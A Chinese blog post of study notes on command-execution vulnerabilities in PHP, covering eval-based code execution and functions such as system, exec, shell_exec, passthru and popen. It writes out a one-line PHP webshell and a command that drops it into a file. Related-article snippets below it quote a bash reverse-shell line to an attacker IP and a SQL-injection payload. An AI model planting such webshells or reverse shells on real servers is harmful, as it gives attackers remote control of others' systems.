命令执行漏洞

已于 2022-10-15 23:30:46 修改
阅读量933 收藏
点赞数
分类专栏: 渗透原理篇 文章标签: bash 开发语言
于 2022-10-15 22:49:02 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_58000413/article/details/127340610
版权

注意:仅用于本人学习的笔记记录,禁止进行传播分享,一旦造成严重后果与本人无关!!!

一、命令执行漏洞原理

代码执行:用户输入的数据当做后端代码执行<?php eval($_REQUEST[8])? >

命令执行:用户输入的数据当做系统命令执行[cmd命令 shell/bash命令]

共生关系:

        代码执行的时候可以通过调用命令执行的函数来达到命令执行的效果

        命令执行也可以写文件得到一句话木马,来达到代码执行的效果

区分方式:真正第一次执行代码所用的函数

二、造成命令执行函数解析

1、system函数

        自动输出、且多行执行【&url编码%26】,传参的时候传入的数据是否会被曲解

2、exec函数

        手动输出,需要echo输出,只能输出单行

        可以直接写一句话木马,或者将内容直接写入文件中[ systeminfo > 1.txt ]

3、shell_exec()

        手动输出多行

4、passthru()

        自动输出,输出多行,和system一样

5、反引号(`)

        在php中是shell_exec的简写,手动输出echo(`whoami`)

6、popen(要执行的命令,参数)

        $a = popen(`whoami`,`r`);echo fread($a,1024);

考虑情况:

        1、代码审计的时候,里面什么函数是开发决定不是你决定

        2、你想用的函数会不会被过滤被禁用【禁止使用】

        php: disable_function配置文件中禁用

扩展内容:

        1、webshell        echo "<?php eval($_REQUEST[8])?>"  >  123.php

        2、反弹shell        [把自己的cmd操作权限给别人]别人可以远程控制你的cmd/bash

木马写进入了,写不出后缀

        1、找文件包含漏洞

        2、绕过他的过滤[在命令行中用其他东西代替,就可以了]

                => 对cmd和bash的使用技巧

不习惯有你
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
经验分享 | 常用linux反弹shell合集
Uguardsec的博客
01-25 908
一、前言 当我们拿到一台LINUX主机的权限时,往往都需要反弹到公网的服务器上,一般我们使用bash反弹的情况居多,但是bash也有失灵的时候。在这种情况下,我们可以尝试使用其他的反弹语句 来达到我们的目的。 二、反弹方法 攻击机:192.168.3.43 靶机:192.168.1.21 、192.168.249.12 1. Bash反弹 1.1 方法一 攻击者主机上执行监听: nc -lvvp port 目标主机上执行bash -i >& /dev/tcp/x.x.x.x/port 0
linux bash shell中文手册
05-03
1.概述 (SYNOPSIS) 2.版权所有 (COPYRIGHT) 3.描述 (DESCRIPTION) 4.选项 (OPTIONS) 5.参数 (ARGUMENTS) 6.启动 (INVOCATION) 7.定义 (DEFINITIONS) 8.保留字 ("RESERVED WORDS") 9.注释 (COMMENTS) 10.引用 (QOUTING) 11.参数 (PARAMETERS) 12.扩展 ( EXPANSION) 12.7 Word Splitting 13.重定向 (REDIRECTION) 14. 别名(ALIASES) 15. 函数)(FUNCTIONS) 16. 算术求值("ARITHMETIC EVALUATION") 17. 条件表达式("CONDITIONAL EXPRESSIONS") 18. 简单命令扩展("SIMPLE COMMAND EXPANSION") 19. 命令执行(COMMAND EXECUTION) 20. 命令执行环境(COMMAND EXECUTION ENVIRONMENT) 21. 环境(ENVIRONMENT) 22. 退出
浅析Linux之bash反弹shell原理
01-08
环境 攻击机:kali            ip:192.168.25.144 靶    机:centos      ip:192.168.25.142 过程 kali 监听本地8888端口 靶机 centos 写入 反弹shell命令 bash -i >& /dev/tcp/192.168.25.144/8888 0>&1 攻击机 kali 成功反弹shell 原理 反弹shell往往是在攻击者无法直接连接受害者的情况下进行的操作,原因有很多,例如目标是局域网,或者开启防火墙的某些策略等情况,而这时,我们就可以让受害者主动向攻击者发起连接,被控端发起请求到控制端某端口,并将其
网络安全-反弹shell详解(攻击,检测与防御
最新发布
2401_84466336的博客
04-23 2459
1.1 什么是 ShellShell 在计算机系统中指的是一个用户界面,用于访问操作系统的服务。在网络安全中,攻击者常利用 Shell 来控制受害者的系统。1.2 反弹 Shell 的工作原理反弹 Shell 的基本原理是:攻击者在其自己的机器上设置监听端口,然后诱使受害者的机器执行一个反向连接的 Shell 命令,连接回攻击者的机器。这样,攻击者就能通过这个反向连接执行命令,控制受害者的计算机。
手工SQL注入流程与常用语句_sql注入 手工(2),34岁网络安全开发大叔感慨
2401_83974173的博客
04-16 586
1’ and (select count(*) from information_schema.tables where table_schema=database() group by concat(0x7e,(select table_name from information_schema.tables where table_schema=database() limit 1,1),0x7e,floor(rand(0)*2)))# 通过修改limit后面数字一个一个爆表。
【网络安全】命令执行漏洞
边缘拼命划水的小陈
04-19 1345
等函数用来执行系统命令。当黑客能控制这些函数的参数时,就可以讲恶意的系统命令拼接到正常的命令中,就会命令执行攻击,这就是命令执行漏洞。应用程序中有时候需要调用一些执行系统命令的函数,在php中常见的为。使用webshell工具连接。linux 操作系统。
内网渗透-常用反弹shell方法总结
lza20001103的博客
04-15 1721
内网渗透-常用反弹shell方法总结
Jenkins 任意文件读取(CVE-2024-23897)+后台用户密码提取哈希破解+反弹Shell 一条龙
黑剑
03-05 3022
本文将深入研究一项涉及Jenkins的安全漏洞(CVE-2024–23897),将在实验室中介绍这些概念,这些技能对于渗透测试期间有效管理输出至关重要,而在本次漏洞利用中,更显得尤为关键。本文还涉及Jenkins凭证管理,针对Jenkins部署,指导参与者如何查找存储的用户和密码信息。更加刺激的是,我们将引导参与者使用Hashcat破解这些凭据,进一步揭露其中的安全挑战。实验的一大亮点是反向Shell测试,要求学员使用Jenkins内置的Groovy脚本控制台建立反向Shell
实战 - YApi 接口管理平台 后台任意命令执行漏洞
HAKUNAMATATATTA的博客
04-23 617
YApi 接口管理平台 后台存在命令执行漏洞,攻击者通过发送特定的请求可执行任意命令获取服务器权限。
反弹shell
Massimo__JAVA的博客
04-27 328
环境:攻击者kali:192.168.116.128受害者centos:192.168.116.95kali监听本地7777端口目标机执行反弹shell命令命令解释为:将目标主机的bash shell以-i交互式的方式,标准输出+错误输出重定向到192.168.116.128:7777,而在192.168.116.128:7777的标准输入命令会重定向到192.168.116.128:7777的标准输出中简言而知,就是将目标主机的标准输入、标准输出、错误输出全都重定向到攻击端上。
shiro远程命令执行漏洞检测工具.zip
11-15
shiro远程命令执行漏洞检测工具:包括了shiro_attack_2.2和ShiroExploit.V2.51,大家可根据需要自行下载
浅析JDWP远程命令执行漏洞 [ Mi1k7ea ]1
08-03
2022/3/2 下午8:30浅析JDWP远程命令漏洞 [ Mi1k7ea ]https://www.mi1k7ea.com/2021/08/06/浅析JDW
远程命令执行漏洞
08-10
NULL 博文链接:https://crabdave.iteye.com/blog/2211641
Apache Log4j反序列化命令执行漏洞
01-10
vulhub靶机里的这个漏洞里缺少了curl或者wget这些命令
命令执行漏洞利用技巧总结
st3pby的博客
05-19 2384
在红蓝对抗中,远程命令执行漏洞往往是攻击方在正面路径中突破边界非常青睐的。常见的可以执行远程命令漏洞的有各种JAVA反序列化漏洞、远程代码执行漏洞、远程命令执行漏洞(原生)、表达式执行漏洞、SQL注入漏洞等。远程命令执行漏洞漏洞探测到漏洞利用其实都非常讲究技巧。如果在进行漏洞探测阶段考虑的情况不全就会很容易遗漏漏洞,与漏洞擦肩而过;在漏洞利用阶段如果知识面不广(姿势不够多)的话可能就会陷入苦苦挣扎却无法获取权限的困境。目标操作系统类型、执行命令结果是否有回显以及是否能通外网。
任意命令执行漏洞的修复
04-16
任意命令执行漏洞是一种常见的安全漏洞,攻击者可以通过该漏洞在受影响的系统上执行任意命令,从而获取系统权限或者进行其他恶意操作。修复该漏洞的关键是要对输入进行有效的过滤和验证,以防止恶意命令的注入。 以下是修复任意命令执行漏洞的一些常见方法: 1. 输入验证和过滤:对于用户输入的数据,应该进行严格的验证和过滤,确保只接受预期的输入。可以使用白名单或正则表达式来限制输入的字符和格式,过滤掉特殊字符和命令注入相关的关键字。 2. 参数化查询:对于数据库查询等操作,应该使用参数化查询或预编译语句,而不是拼接字符串的方式构建查询语句。参数化查询可以有效地防止SQL注入攻击,从而间接防止任意命令执行漏洞。 3. 最小权限原则:在配置系统和应用程序时,应该按照最小权限原则进行设置。即给予每个组件或用户所需的最低权限,避免赋予过高的权限。这样即使发生漏洞利用,攻击者也只能在受限的权限范围内操作。 4. 安全编码实践:开发人员应该遵循安全编码实践,如避免使用不可信的输入直接拼接命令、避免使用eval()等危险的函数、避免使用系统命令执行函数等。同时,及时更新和修复已知的安全漏洞,以保持系统的安全性。 5. 安全审计和漏洞扫描:定期进行安全审计和漏洞扫描,及时发现和修复潜在的任意命令执行漏洞。可以使用专业的安全工具进行扫描,如静态代码分析工具、漏洞扫描器等。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值